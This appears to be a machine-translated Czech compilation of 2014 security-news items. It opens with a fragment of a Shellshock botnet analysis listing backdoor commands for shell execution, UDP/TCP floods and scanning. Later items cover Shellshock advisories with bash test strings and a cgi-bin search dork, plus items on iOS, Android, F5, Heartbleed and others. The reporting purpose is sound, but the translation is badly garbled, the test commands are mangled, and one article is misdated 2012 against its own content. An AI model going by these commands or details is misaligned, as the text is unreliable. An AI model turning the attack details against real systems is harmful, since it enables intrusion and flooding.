K dispozici je také primitivní honeypot otisky prstů rutina implementována, který využívá " BusyBox ", jak popsal Internet Storm Center zde .

shellshock_busybox_honeypot_fingerprinting_ortloff

Dalším úkolem zločinci začít krabici oběti je zahájeno v souladu 14. Zde je řečeno, binární provádět zaplavení IP 69.xx.xx.67 pomocí protokolu UDP na 50 sekund. V souladu 17 útočníci zastavit záplavu, aby jej restartovat v řadě 18, se zaměřením 178.xx241 . " Žádný zabil. " odpověď v souladu 21 se zobrazí, protože záplavy instrukce z linky 14 byl již ukončen, když se útočník snažil zastavit pomocí " *! KILLATTK "v řádku 17.

Zde je kompletní seznam příkazů backdoor akceptuje:

! * PING - Odpovědi na "PONG!" * SH! - spustit libovolný příkaz shellu * GETLOCALIP! - Odpovědi na "moje IP: $ ipaddr" ! * Scanner | OFF - skenování náhodné sítě, provést velmi malou slovníkový útok (viz výše), zkouška, zda cíl je honeypot

! * HOLD - Držte povodně ! * Junk - Proveďte nezdravé povodeň ! * UDP - Proveďte UDP Flood * TCP! - Proveďte TCP oken * KILLATTK! - Zabij všechny povodeň ! * LOLNOGTFO - Ukončit backdoor.



Související binární soubory:

73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489
2d3e0be24ef668b85ed48e81ebb50dce50612fb8dce96879f80306701bc41614
ae3b4f296957ee0a208003569647f04e585775be1f3992921af996b320cf520b


Stará chyba v shellu Bash postihuje půl miliardy zařízení

26.9.2012 Zranitelnosti
Experti na internetu objevili bezpečnostní riziko, které postihuje stovky milionů počítačů, serverů a dalších zařízení s operačními systémy typu Unix, Linux nebo OS X.

Díra byla objevena v jednom z nejrozšířenějších prostředí příkazového řádku známém jako Bash, který je součástí mnoha unixových a linuxových systémů, stejně jako operačního systému pro OS X od Applu. Chyba, jíž experti přezdávají „Shellshock“, může být využita k získání vzdálené kontroly nad téměř jakýmkoli systémem obsahujícím Bash. Podle některých odborníků je nové riziko mnohem nebezpečnější, než Heartbleed, o němž se hodně psalo v dubnu tohoto roku.

„Zatímco Heartbleed umožňoval zjistit o uživateli co nejvíc věcí, Shellshock umožňuje převzít přímou kontrolu nad systémem,“ uvedl profesor Alan Woodward z University of Surrey. Hearbleed ohrožoval asi půl milionu počítačů na celém světě, Shellshock se však podle konzervativních odhadů expertů týká minimálně pěti set milionů zařízení. Problém je o to závažnější, že řada webových serverů používá software Apache, který využívá právě Bash.

Bash (Bourne-Again SHell) je příkazový řádek na mnoha počítačích s Unixem. Unix je operační systém, na němž je postavena nebo se v něm inspiruje řada dalších OS – například Linux nebo OS X. O novém riziku na svých stránkách informoval i mimo jiné US Computer Emergency Readiness Team (US-Cert) s tím, že správci by měli co nejdříve použít bezpečnostní opravy. Jiní bezpečnostní experti však varovali před tím, že aktualizace jsou „neúplné“ a počítače plně nezabezpečí.
 

Shellshock je na škále od jedné do deseti označen jako desítka, tudíž už ani nemůže být více nebezpečný. Jednak je zde značný počet uživatelů, kteří mohou být postiženi, hlavně je však pro Shellshock již volně dostupný exploit a ví se, že kyberzločinci aktivně hledají webové stránky, které by byly vhodné k provedení útoku. Servery nyní podle expertů chrání především fakt, že kybernetičtí útočníci jsou líní a pouze kopírují to, co již jiní vymysleli. Hledání exploitů je těžká práce, tudíž většina útočníků pouze využívá již publikované informace.

I když bezpečnostní experti ze společnosti Rapid7 ohodnotili Bash jako 10/10 co do závažnosti, označili jej jako „málo“ sofistifikovaný. „S použitím této díry útočníci mohou potenciálně převzít kontrolu nad operačním systémem, přistupovat k citlivým informacím, provádět změny a tak dále,“ uvedl Tod Beardsley z Rapid7. Jak uvedla společnost Kaspersky Labs, zranitelnost již byla kyberzločinci zneužita k napadení webových serverů. Běžným domácím uživatelům, kteří mají obavy z bezpečnosti, pak profesor Woodward doporučuje sledovat webové stránky výrobců hardwaru, především směrovačů, a čekat na aktualizace.


Aktualizace CVE-2014-6271: Chyba zabezpečení v bash (Shellshock)
25.9.2014 Zranitelnosti
(Tento deník bude aktualizován s odkazy na příslušné zdroje brzy)

Včera, zranitelnost v bash bylo oznámeno, že byl původně nalezen Stephane Schazelas. Tato chyba zabezpečení umožňuje spuštění libovolného kódu v bash stanovením konkrétních proměnných prostředí. Později Travis Ormandymu vydala druhý exploit, který bude pracovat na opravené systémů. Prokázání, že patch včera propuštěn je neúplný.

Jaký je dopad této chyby zabezpečení?
Zpočátku chyba nevypadá všechno vážně. Spouštění příkazů je to, co bash používá. Ale v tomto případě, kód může být provedena bez uživatelova záměru nastavením proměnné prostředí.

Nejproblematičtější situace je bash skripty provedeny pomocí cgi-bin. Specifikace CGI vyžaduje webový server převést HTTP hlavičky požadavku dodaných klientem proměnné prostředí. Pokud bash skript je volán přes cgi-bin, může útočník použít k spuštění kódu jako webový server.

Jiné, méně pravděpodobné scénáře zahrnovat SSH, což lze nastavit proměnné prostředí, ale musely by být nastavena na serveru v konfiguračním souboru. Klienti DHCP může být v některých případech spustit bash skripty a použít proměnné prostředí dodávané serverem. Tento případ může být zneužitelné, pokud se uživatel připojí k nedůvěryhodné DHCP serverem ("cofeehouse wifi").

Mám použít opravu?
Ano. Náplast se opravit jeden aspekt zranitelnosti. Nicméně, oprava není kompletní a není zcela opravit chybu. Nejsme si vědomi žádných vedlejších účinků náplasti.

Jaké jsou další možnosti? Co jiného bych měl dělat?
Vzhledem k tomu, patch je neúplná, měli byste se pokusit zavést dodatečná opatření na ochranu systémů. Různé Intrusion Detection System (IDS) a Web Application Firewall (WAF) dodavatelé vydali pravidla pro blokování vykořisťování. Uvědomte si, že tato pravidla mohou být neúplné stejně. Mnoho pravidel, které jsem viděl zatím jen podívat na řetězec ") {(", která byla přítomna v původní důkaz konceptu využití, ale může být snadno změnit například přidáním více či různých bílých míst.

Dalo by se přepnout výchozí shell alternativu jako ksh nebo sh. Ale to je, bude pravděpodobně rozbít existující skripty. Různé mušle používají mírně odlišné syntaxi.

Na mnoha vestavěných systémů, které již může použít alternativní shell ("busybox"), který není zranitelný.

Jak mohu najít zranitelné systémy?
Pokud se můžete přihlásit do systému, můžete použít jeden z těchto zkušebních řetězců:

Chcete-li zjistit, zda se oprava, můžete použít původní testovací řetězec:

env x = '() {} ;;; echo zranitelný "sh-c" echo toto je test "
Pokud se oprava, ale chci ukázat, že jste stále zranitelné, můžete
použít tento příkaz:

env X = '() {() => \' sh-c "echo termín";
Tento příkaz vrátí chybu na opravenou bitové kopie instalace systému, ale to bude ještě
vytvořit prázdný soubor s názvem "echo".

Existují různé moduly pro zranitelnost skenery hledat zranitelné systémy. Můžete také použít rychlé vyhledávání Google, které by mohly pro zranitelné webové servery:
filetype: sh inurl: cgi-bin stránky: [Vaše doména]
Tato Google zkontrolovat můj návrat skripty, které používají jiné skořápky a pak bash.

Dávejte pozor, aby zkontrolovat webové servery ve vestavěných systémech, jako jsou směrovače, protože může pracovat nejen bash skripty, ale mohou tak učinit na zvýšenými oprávněními.

Jsou systémy již zneužita?
Viděli jsme zprávy vyhledává zranitelnosti.


Pozornost * NIX administrátoři, je čas opravit!
25.9.2014 Zranitelnosti
V posledních letech jsme zvykli na Microsoft záplaty, důležitých, kritické těch, které mohly znamenat váš systém plně zranitelný, pokud jste nepoužili je. Asi jsme se stala tak zvyklí, že někdy zapomínáme, že naše servery Linux také nutné opravy.

Dnes jsem se dozvěděl o kritické Bash náplast, která se zabývá CVE-2014 do 6271. Dle poradenství :

"Chyba byla nalezena na cestě Bash hodnoceného určité speciálně vytvořené proměnné prostředí. Útočník by mohl využít tuto chybu potlačit nebo bypass prostředí omezení spouštět příkazy shellu. Některé služby a aplikace umožnit vzdálené spuštění neověřených útočníkům poskytovat proměnné prostředí, které jim umožní využívat tento problém. "

Náplasti jsou již připraveny pro většinu distribucí Linux, jako je RedHat a Debian, a tak ztrácet čas.


iOS 7.1.x využívat zpřístupněné (CVE-2014-4377)
22.9.2014 Zranitelnosti
Copak upgradovat na iOS 8 ještě? Kromě mnoha nových funkcí, Apple také opravil několik bezpečnostních chyb v iOS 8. Například CVE-2014-4377, emise paměti corrupion v základní grafickou knihovnu Ios. Využívat je nyní k dispozici pro tuto chybu zabezpečení.

Poznámka: jsem ověřil ještě, že exploit funguje / genuine. Nebudeme spojovat v tomto bodě k využití kódu, ale základní Google Fu by vám mělo umožnit, aby ji našel.

Autor tvrdí, že využití je "compleatly spolehlivá a přenositelná na iOS 7.1.x". Využití přichází v podobě chybně PDF, který by obvykle měly být poskytnuty jako obrázek uvnitř HTML stránky.


Webový prohlížeč v Androidu obsahuje závažnou chybu

22.9.2014 Zranitelnosti
Open-sourcový webový prohlížeč integrovaný do operačního systému Android obsahuje zranitelnost, která umožňuje nebezpečným webovým stránkám umisťovat javascriptový kód do jiných stránek.

Tento nebezpečný kód následně může číst cookie či hesla, posílat formuláře, zachycovat stisknutí kláves uživatelem a provádět spoustu dalších úkonů.

Webové prohlížeče jsou obecně nevrženy tak, aby zamezovaly skriptu z jedné stránky přistupovat k obsahu na druhé stránce. K zaručení této ochrany je použit princip SOP (Same Origin Policy): skripty mohou pouze číst či upravovat prvky webových stránek, jež přicházejí ze stejného zdroje jako samotný skript. Zdroj je pak identifikován pomocí protokolu, domény a čísla portu. SOP by měl zabraňovat tomu, aby například skript z http://červ.cz/ mohl přistupovat například k obsahu na http://computerworld.cz/.

Chyba v androidovém prohlížeči však umožňuje prolomení SOP. Jak zjistil Rafay Baloch, pokud je javascriptový kód vytvořen určitým způsobem, může zcela ignorovat SOP a bez jakýchkoli dalších omezení zasahovat do obsahu jiných webových stránek. To prakticky znamená, že jakákoli webová stránka navštívená v prohlížeči může krást citlivá data. Z uvedeného je zřejmé, že jde o kritickou zranitelnost, kterou je třeba opravit, a to rychle.

Google ve snaze získat nad Androidem větší kontrolu, svůj prohlížeč AOSP z Androidu částečně odstranil u verze 4.2 a u verze 4.4 jej zcela nahradil prohlížečem Chrome. Stejně tak, jako se nevypařily po oficiálním ukončení podpory z internetu Windows XP, však nezmizela ani aplikace open-sourcového androidového prohlížeče. Androidový prohlížeč v současné době v reálu používá více lidí než Chrome, jelikož jen málo uživatelů má nejnovější verzi Androidu a ještě méně si nainstaluje Chrome a používá ho.

Androidový prohlížeč je také zakomponován do produktů třetích stran a někteří uživatelé si jej dokonce nainstalovali na Android 4.4, jelikož jej preferují oproti Chromu. Baloch problém nahlásil Googlu, avšak společnost mu odpověděla, že se jejím technikům nepovedlo problém reprodukovat, a celou věc uzavřel. Baloch tedy celý případ popsal na blogu a vyvinul framework, který díru umožňuje testovat. Google následně oznámil, že se mu již problém podařilo zjistit a pracuje na záplatě.

Jak však záplata bude distribuována, není jasné. Chrome je aktualizován přes Play Store a starý androidový prohlížeč byl opravován jen v rámci aktualizací celého operačního systému. Ty však nejsou zdaleka tak časté. Bezpečnostní experti proto v mezidobí doporučují, aby uživatelé starších verzích Androidu přešli na Chrome, Firefox nebo Operu.


PHP Opravuje několik chyb ve verzi 5.4 a 5.5
20.9.2014 Zranitelnosti
PHP oznámil vydána verze 5.5.17 a 05.4.33. Deset chyby byly opraveny ve verzi 5.4.33 a 15 chyby byly opraveny ve verzi 5.5.17. Všichni uživatelé PHP se doporučuje upgrade.The nejnovější verzi jsou k dispozici ke stažení zde .

[1]-http://php.net/ChangeLog 5.php#5.4.33
[2] http://php.net/ChangeLog-5.php#5.5.17
[3] http: //windows.php NET / download


DARPA je po chyb v algoritmech implementována v softwaru
20.9.2014 Zranitelnosti
Defense Advanced Projects agentura pro výzkum (DARPA), hledá nové techniky analýzy programu a nástrojů, které umožňují analytikům určit slabiny algoritmů implementovaných v softwaru používaného americkou vládou, vojenské a ekonomické subjekty, a oznámila, že bude přijímat návrhy výzkumných na toto téma do 28 října. prostoru / času Analýza Cybersecurity (STAC), program je především zaměřena na odhalení slabých míst v souvislosti s prostorem a časem zdrojů chováním použití algoritmů, stejně jako zranitelná místa vyplývající z algoritmické složitosti a těch využitelné pro boční útoky kanálu. "jako nové obranných technologií, aby staré třídy zranitelnosti obtížné úspěšně využít, protivníci přestěhovat do nových tříd zranitelnosti," agentura uvedl v oznámení. "Chyby na základě vadných implementací algoritmů byly populární cíle pro mnoho let. Avšak poté, co nové obranné technologie, aby zranitelnosti na základě chybných implementací méně běžných i ztížených využívat, protivníci se obrátit svou pozornost na slabá místa vyplývajících samotných algoritmů." Agentura je nastaven na hledání těch zranitelností jako první. "Vývoj nových metod analýzy program najít algoritmické využití prostředků zranitelnosti nebude snadné," uvedly. "Analýza bude pravděpodobně muset najít cesty vedoucí z nepřátelských řízených vstupů na opakování struktur, které by mohly spotřebovat ochromující množství prostor a čas, a cesty vedoucí z tajemství výstupů, jejichž prostor nebo doba používání potenciálně může dojít k úniku informací. Analýzy také budou muset předvídat hranice na místo a doba používání dostatečně přesně rozlišovat mezi případy, kdy je to možné odepření služby nebo netěsnosti a případy, kdy tomu tak není. " Oni předpovídají, že "dokonalý" automatizovaný nástroj, který může poskytnout odpovědi na netriviálních otázek o chování programu . bude možné rozvíjet, ale věřte, že kombinované návěsy automatizované analýzy může být užitečné, "Program STAC snaží zálohy podél dvou hlavních výkonnostních os: rozsah a rychlost," vysvětlili. "Scale odkazuje na potřebu analýz, které jsou schopny s ohledem na větší kusy softwaru, od těch, které implementovat síťové služby se obvykle pohybuje v rozmezí stovek tisíc řádků zdrojového kódu, aby i větší systémy zahrnující miliony či desítky milionů řádků kód. Speed ​​se vztahuje k potřebě zvýšit rychlost, při které může lidská analytici analyzovat software pomocí automatizovaných nástrojů, z tisíců řádků kódu za hodinu až desetitisíce, statisíce nebo miliony řádků kódu za hodinu . " Pro více informací o programu, podívejte se na oznámení neusilovat , a velmi podrobný oznámení .


FreeBSD Denial of Service poradenství (CVE-2004 až 0230)
17.9.2014 Zranitelnosti
Chyba byla objevena Johnathan Looney na Juniper Sirt ve FreeBSD (základ pro Junos a mnoho dalších výrobků) ve způsobu, jakým FreeBSD zpracovává určitým pakety TCP (https://www.freebsd.org/security/advisories/FreeBSD-SA -14: 19.tcp.asc) Pokud budete posílat TCP SYN pakety pro existující připojení (tedy správný zdroj IP, zdrojový port, cílová IP, cílový port kombinaci), operační systém zbourat připojení.

Útok je podobný "uklouznutí v okně TCP" útok popsal v roce 2004 Paul Watson (http://packetstormsecurity.com/files/author/3245/), ale pomocí SYN pakety místo RST. Jeden z Psovodi úspěšně reprodukovat útok ve své laboratoři.

Pro ty z vás, které nemají FreeBSD ve vašem prostředí, pravděpodobně ano. Existuje řada přípravků, které využívají FreeBSD jako jejich základní operační systém. Málo, že na jaře na mysli, jsou OSX, Bluecoats Checkpoint NetScaler a více (částečný seznam je zde http://en.wikipedia.org/wiki/List_of_products_based_on_FreeBSD).

Dávejte pozor na aktualizace z vašich dodavatelů, Juniper je tady -> http://kb.juniper.net/ InfoCenter ? / index page = content & id = JSA10638 & cat = SIRT_1 & actp = SEZNAM


Zranitelnosti sítě IT administrátoři mohou používat pro ochranu své sítě
12.9.2014 Zranitelnosti
Být schopen přizpůsobit se změnám je jednou z nejdůležitějších schopností v oblasti zabezpečení dnes, hlavně proto, že útoky na obranu proti jsou schopni udělat totéž. Vyspělost současných hrozeb je vidět především v jejich schopnosti přizpůsobit na základě slabých životního prostředí, které se zaměřují. V tomto příspěvku se budeme snažit vidět sítím, jak útočníci je vidět - přes jejich zranitelnosti - a zase to asi do vedení na to, jak správcům IT by měl chránit své sítě. Lidé jsou nejslabším článkem Lidé budou vždy zůstane citlivá na vnější podněty, a to zejména těch, které vyvolá silné emoce. To je důvod, proč sociální inženýrství bude vždy součástí útoků - existuje mnoho technik, které mají být použity, a vysoká pravděpodobnost účinnosti. Přijímání předpoklad, že lidé budou vždy stane obětí útoků sociálního inženýrství je důležité pro IT administrátoři jednoduše proto, že je to pravda. Musí bezpečnostní síť by měla být navržena s ohledem na tuto skutečnost, bez ohledu na to, jak orientované jsou zaměstnanci. Mohou IT administrátoři: 1. Konfiguraci sítě, aby se zabránilo nejen útočníkům dostat se do sítě, ale také získávání dat z něj. Tímto způsobem, i když je útočník schopen získat kontrolu nad strojem v síti, exfiltrating žádné kradené údaje bude obtížné. Řádně spravovány řízení přístupu Firewall a síť by výrazně pomoci tohoto cíle dosáhnout. Inteligence hrozba bude také hrát velkou roli zde také, jako IP adres používaných jako C & Cs útoků. 2. Segment sítě v závislosti na úrovni zabezpečení systémy potřebují. Kritické systémy musí být odděleny od "normální" ty, ať už fyzicky nebo prostřednictvím segmentu sítě, které jsou připojené k. Kromě nich je však vzdělávání zaměstnanců je stále důležitá a měla by být pravidelně dělat. nejbezpečnější místo je nejnebezpečnější Dokonce i ty nejmenší mezery zabezpečení v rámci sítě může vést k největším porušení. Útočníci vědí dobře, a to je důležité pro IT administrátorům udržovat ji v mysli. Síť by měla být předmětem auditu pravidelně, aby se ujistil, že všechny plochy jsou řádně zajištěny. Například IT administrátoři se nemusí brát v úvahu, že oni sami jsou potenciálními cíli, nebo že určité zařízení v síti může být také infekce body, jako jsou Síťová tiskárna nebo dokonce router . Totéž platí i pro webové administrátory. Útočníci se nemusí přímo porušit vysoce zabezpečené stránky, jako je například bankovnictví webové stránky, místo toho, kontrola dalších místech ve stejném DMZ (demilitarizovaná zóna), kompromis je, a využít důvěru-vztah provést útok side-channel proti bankovním webu. Lidé používají slabá hesla Není žádným tajemstvím, že pro správu hesel, je výzvou pro většinu uživatelů, tak pracuje na základě předpokladu, že všichni členové sítě mají bezpečná hesla prostě není možné. Pro zajištění sítě za předpokladu, že uživatelé mají nezabezpečené hesla by vyžadovaly provádění dalších opatření, ověřování, jako dvoufaktorové autentizace , nebo dokonce biometrických údajů. Síť je pronásleduje duch stroje Všechny sítě mají duchy strojů v nich. Jedná se o stroje, které nejsou nalezené v síti topologie mapě, ale jsou připojeny k síti. Ty se mohou skládat z "osobních zařízení, externích partnerů zaměstnanců zařízení nebo strojů, které by měly být v důchodu, ale nejsou. Útočníci páka na těchto strojích, protože poskytují jak přístup k síti a stealth. Za účelem obrany správci IT musí být zájem o monitorování systémů, které jsou připojeny k síti. Je třeba, aby zavedla mechanismus řízení přístupu k síti sledovat a řídit úroveň přístupu těchto duchů stroje jsou oprávněni v síti. Staré zranitelnosti jsou spolehlivé a mohou být stále používány Posouzení a řešení softwarové zranitelnosti je rozhodující proces pro každého správce IT, a měl by vždy pokrýt všechny chyby - nové i staré. IT správcům je třeba mít na paměti, že zranitelnost zůstane hrozba k síti, pokud nejsou řešeny, bez ohledu na to, jak dlouho jeho byla, protože to bylo objeveno. Autor: Ziv Chang, ředitel Cyber ​​bezpečnostní řešení na Trend Micro .


F5 BigIP neověřené rsync Vulnerability
8.9.2014 Zranitelnosti
Důvod, proč jsem se rozhodl napsat tuto chybu není skutečnost, že je to velmi populární systém, nebo že existuje obrovské riziko zde. Hlavním důvodem je to, že mi připadala s jistou dávkou smutku, které budeme muset řešit tento problém v roce 2014 Například, našel jsem návod konfiguraci rsync z roku 1999, které doporučuje použití rsync přes ssh [1].

F5 využívá rsync pro synchronizaci konfigurace v případě, že pro vyrovnávání zatížení BigIP se používá v režimu vysoké dostupnosti. Je smutné, že rsync server, který se používá pro toto nevyžaduje žádné ověřování. Výsledkem je, že útočník může nahrávat a stahovat libovolné soubory. Proof of concept využít obrázky "authorized_keys" soubor umožňující útočníkovi ssh do zařízení a získání plného přístupu shell. Aby bylo zranitelné, rozhraní používá k synchronizaci zařízení musí být vystavena [2].

F5 dělal patch k dispozici [3].

Ale myslím, že lekce je větší než "Patch F5". Jedná se o nezapomínat historii. V mnoha z našich kurzů, stížnost je důvod, proč jsou některé starší zranitelnosti. Například naše " Zajištění Unix "třída se děje přes některé problémy s" r "služby, jako je" rsh "a jak automatizovat téměř cokoliv pomocí ssh.

Co byste měli udělat? Jako první krok, rychlé skenování v síti otevřených rsync servery (port 873 TCP). Dále, pokud používáte ssh, jak byste měli, podívejte se na to, jak se vám podaří ssh klíče, protože to je další velký problém. Jste udržet své tajné klíče v jedné (a pouze jeden), bezpečné místo? Myslíte si, používat různé klíče pro různé účely? To může být větší projekt vypracovat a realizovat správně.

[1] http://everythinglinux.org/rsync/
[2]
http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15236.html


Heartbleed stále kritická hrozba
4.9.2014 Zranitelnosti

Cyber ​​útočníci byli rychle využít Hearbleed OpenSSL chyba, ve výši stovek tisíc útoků za den v týdnu po veřejném odhalení své existence, statistiky sdíleny v poslední čtvrtletní zpravodajské Threat Report IBM X-Force ukázaly. "Velký důraz byl kladen na přípravu a zmírnění zero-day útoky, ale v případě Heartbleed, více zajímavá studie dojde po zveřejnění, když oba útočníci a podniky jsou závodní proti času," poznamenal Leslie Horacek, manažer odpověď ohrožení . IBM X-Force bezpečnostního výzkumu skupiny "IBM Managed Security Services (MSS) svědkem útočníky okamžitě přebudovat a využívání chybu v globálním měřítku," sdílela, a útoky přišel rychlý a silný (klikněte na screenshot pro zvětšení): Méně než dva týdny po, počet útoků, které se snaží zneužít chybu výrazně klesla, ale je stále významný. "MSS vidí v průměru 7.000 útoků za den po velkém útoku," je uvedeno v zprávě (nutná registrace). "Tam bylo mnoho ponaučení z Heartbleed útoky," výzkumníci poukazují. "Organizace, která se snažila k udržování aktuální databáze aktivum byly ponechány slepí, které systémy jsou zranitelné a které systémy byly kritické. I kdyby měli plán reakce na incidenty, potřebovali databáze up-to-date majetku za účelem jeho nasazení. " jejich zmírnění techniky, jako je použití brány firewall blokovat většinu útoků, stejně jako detekci a prevenci narušení zařízení může pomoci snížit riziko až patch může být nasazen. Mezi prodejci software obsahující tuto chybu může také nabídnout dočasné náhradní řešení, a konečně, dočasné řešení, které se často nebere v úvahu vypínání zranitelné systémy do patch k dispozici. Zatímco tento poslední volba není obvykle přivítal podniky, jak se jejich systémy a uživatelských dat možná ohrožena je ještě horší jeden. Bohužel, poslední čísla ukazují, že v roce i přes obrovské pozornosti Heartbleed obdržela, mnoho systémů stále unpatched, a to je situace, která útočníci budou i nadále využívat.


Nový Chrome opravuje 50 bezpečnostních otázek, chyba lovec dostane $ 30k
2.9.2014 Zranitelnosti
Které zavedly 50 opravy zabezpečení , tým Google Chrome je vytlačena novou stabilní verzi oblíbeného prohlížeče.

Společnost nesdílí mnoho podrobností o chybách, protože je to první čekají na většinu uživatelů za účelem provádění oprav, ale bylo zjištěno, že získal 30.000 dolar na několika výzkumných pracovníků určených pouze lokihardt @ asrt pro zveřejňování "kombinace chyb v V8, IPC, synchronizace a rozšíření, které mohou vést ke vzdálenému spuštění kódu mimo sandbox. " Jiní vědci se uděluje od 4000 dolar a 500 dolarů za zabil vysokých a středních závažnosti chyby a bezpečnostní tým Chrome byl chválen pro nalezení široký . řada nedostatků prostřednictvím interních auditů, fuzzing a dalších iniciativ uživatelé Windows mají další dobrou zprávu: Windows 64bit Chrome je pryč "stable". "64-bit Chrome nabízí mnoho výhod pro rychlost, stabilitu a bezpečnost Naše měření ukázala, že nativní. 64-bitová verze Chrome se zlepšila rychlost na mnoho našich grafiky a mediálních měřítek, "sdílený softwarový inženýr Will Harris v blogu oznámil vydání. "Například VP9 kodek, který je používán v High Definition videa z YouTube ukazuje 15% zlepšení výkonu dekódování. Měření stability od lidí, rozhodli do naší Canary, Dev a Beta 64-bitové kanály potvrzují, že 64-bit rendering motory jsou téměř dvakrát tak stabilní jako 32-bitové motorů při manipulaci typický webový obsah. Konečně, na 64-bit, naše obrana do hloubky zabezpečení snižující závažnost rizika, jako je Partition Alloc jsou schopni mnohem efektivněji bránit proti zranitelnosti, které se spoléhají na kontrolu rozložení paměti objektů. " Uživatelé těší na použití 64-bit Chrome, musíte ručně stáhnout instalátor, a být si vědom, že v současné době neexistuje 32-bitová podpora NPAPI plugin.


Vědci využívají chybu vázat tajné uživatelům jejich tajemství
29.8.2014 Zranitelnosti
Tajemství, které sdílíte na tajemství, populární aplikace, která umožňuje lidem sdílet zprávy anonymně v rámci svého kruhu přátel, přátelé přátel a veřejnosti, může být snadno přičíst na vás, jestli útočník ví, že e-mailová adresa, kterou jste použili, aby se účet.

Proof-of-concept útoku byl navržen a proveden bílými hat hackeři Ben Caudill a Bryan Seely, spoluzakladatel a CTO (v tomto pořadí) Rhino Security Labs, a je to docela snadné provést. Oni jen potřebovali vytvořit sedm figuríny tajné účty, odstranit jejich celá iPhone seznamy kontaktů, přidejte sedm falešné e-mailové adresy jako kontakty a přidejte e-mailovou adresu u cíle. Další, museli vytvořit nový tajný účet a synchronizovat své kontakty, který dovolil, aby byly v "okruh přátel", které sdílejí svá tajemství. Ale protože sedm z účtů v kruhu jsou falešné, je logické, že jakákoli tajemství "od přítele", který je sdílen přijede z jediného reálného účtu:. Cílovém Dobrou zprávou je, že tento konkrétní zranitelnost nemůže být využívány v opačném směru, nemůžete vidět náhodné tajemství a zjistit, kdo je vyslán. chyba, která dovolila tento útok má být provedena byla stanovena již, jak vědci sdílí jejich objev se společností za aplikaci, přes jejich chyby odměnu program, který je zřejmě velmi úspěšná. "Jak hackeři zveřejnit tyto druhy zranitelnosti prostřednictvím naší HackerOne odměnu, jen aby více a více vylepšení," Secret generální ředitel David Byttow komentoval pro Wired. "Měli jsme nulovou veřejné události s ohledem na bezpečnost a soukromí. Vše, co prošla naší štědrosti programu. " On také říká, že nic nenasvědčuje tomu, že ostatní hackeři přišli s exploit a použil ho. Přesto, nemůže prokázat, že určitě nikdo nemá. Tajné uživatelé by měli mít na paměti, že žádný systém není dostatečně bezpečný. Nejlepší způsob, jak udržet tajemství je, aby ji udrželi, ne sdílet.


Kritická Delphi a C Builder ++ VCL knihovna chyba nalezena
28.8.2014 Zranitelnosti
Buffer overflow chyba zabezpečení, která by mohla být využita k provádění škodlivého kódu byla objevena v aplikaci Visual Component Library (VCL) knihovny Delphi a C ++ vývojových prostředí pro tvorbu aplikací Embarcadero a mohl by proto ovlivnit také aplikace, které byly vytvořeny pomocí software a které používají postiženou knihovnu.

Problém byl poprvé objeven jádra bezpečnostní výzkumník. "Marcos Accossatto z našeho Exploit psaní tým zjistil chybu v postiženém žádosti manuální změnou některé hodnoty v BMP záhlaví Ukázkový obrázek, později potvrzuje zjištění týkající se sadou aplikací pro manipulaci s image města," vysvětlil Flavio De Cristofaro, firmy VP inženýrství pro profesionální produkty. "Při manipulaci soubor BMP, bylo zjištěno, že některé aplikace sady by dojít k chybě. To nás vedlo k předpokládat softwarovou knihovnu, společný pro všechny aplikace, byl pravděpodobně zodpovědný za havárii, která nás vedla k viník. " "C ++ Builder a Delphi byly použity při vývoji softwaru pro mnoho let. Finanční instituce, zdravotnické organizace a firmy v několika dalších odvětvích se vyvíjely tamní domácí aplikace používající tyto produkty," poznamenal, a řekl, že je to těžké říci, které konkrétní software je ovlivněn. chybu zabezpečení lze zneužít v místě, je-li uživatel pro zpřístupnění chybně soubor BMP na postiženou aplikaci. "I když na straně klienta útok se zdá být nejpravděpodobnější cíl útoku, některé aplikace umožňují vzdálené uživatel nahrát chybně soubory. V tomto případě je postižená aplikace může být vzdáleně zneužitelné, "De Cristofaro dodal. Jakmile zranitelnost zneužít, útočník má stejnou úroveň oprávnění uživatele, běží zranitelné aplikace. To se často promítá do schopnosti vykonat cokoliv programu, který nebo ona chce. chyba byla oprava, a v závislosti na verzi Delphi a C ++ Builder, mohou uživatelé dělat několik věcí . "Uživatelé budou muset zkontrolovat novější verze softwaru, která obsahuje tuto opravu do postižené softwarových komponent a, za naše porozumění, budou muset překompilovat kód pomocí nové verze softwaru, "radil. "alternativní ovlivněné uživatelé mohou zvážit nahradí postiženou součást (VCL) s ekvivalentním balíčku pro manipulaci s obrázky. Také, pokud postižené uživatelé nemají k dispozici zdrojový kód, nebo nejsou ochotni překompilovat program, mohou použít jiný software, jako Sentinel nebo Emet třetí strany, která by mohla pomoci, aby se zabránilo zneužívání postižených systémů do jisté míry. " Ve všech případ, uživatelé by měli kontaktovat Embarcadero Další informace o tom, jak problém vyřešit. Core Security také nabídl pomoc společnostem, které ji mohli potřebovat, a oznámil , že se neuvolní příkladu kódu veřejně v současné době, jak dát dotčeným společnosti dost času na záplatování.


Microsoft spraví rozbité Security Patch MS14-045
28.8.2014 Zranitelnosti
Microsoft dnes re-povolený bulletin zabezpečení MS14-045 , která byla stažena krátce po změnách v srpnu Patch úterý , protože počet uživatelů hlášeny pády a modré obrazovky. Patch byl odstraněn z webu Windows Update 15 srpna, tři dny poté, co byl propuštěn v rámci měsíčního cyklu aplikace náplasti Microsoft.

"Jakmile jsme si uvědomili některých problémů, jsme začali recenzi a hned vytáhl problematické aktualizace, takže to není k dispozici ke stažení," říká Tracey Pretorius, ředitel Trustworthy Computing ve společnosti Microsoft. "Pak jsme začali pracovat na plánu RERELEASE postižené aktualizace."

MS14-045 oprava chyby zabezpečení ovladače režimu jádra, které byly hodnoceny důležité Microsoft, protože vyžadují platné pověření a místní přístup za účelem využití. Úspěšné využije mohlo vést k povýšení oprávnění na infikovaný stroj se systémem Windows.

Microsoft uvedl, že v době, kdy otázka písmo oprava v aktualizaci byl viník způsobí vykazované zhroucení systému. Microsoft uvedl, že byly ovlivněny pouze malý počet počítačů. Tam byly jiné problémy s bulletinu nejzávažnější způsobující systémy se zhroutí a činí 0 × 50 stop chybová zpráva po instalaci. Uživatelé byli také svědky "soubor je již používán" chybové zprávy, protože emise písma v pochybnost.

Chyby vliv na systémech Windows celou cestu zpět na systém Windows Server 2003 a všechny podporované desktopové verze systému Windows. Uživatelé Windows Update automaticky získat opravu, jinak, Microsoft doporučuje uživatelům instalovat aktualizace.

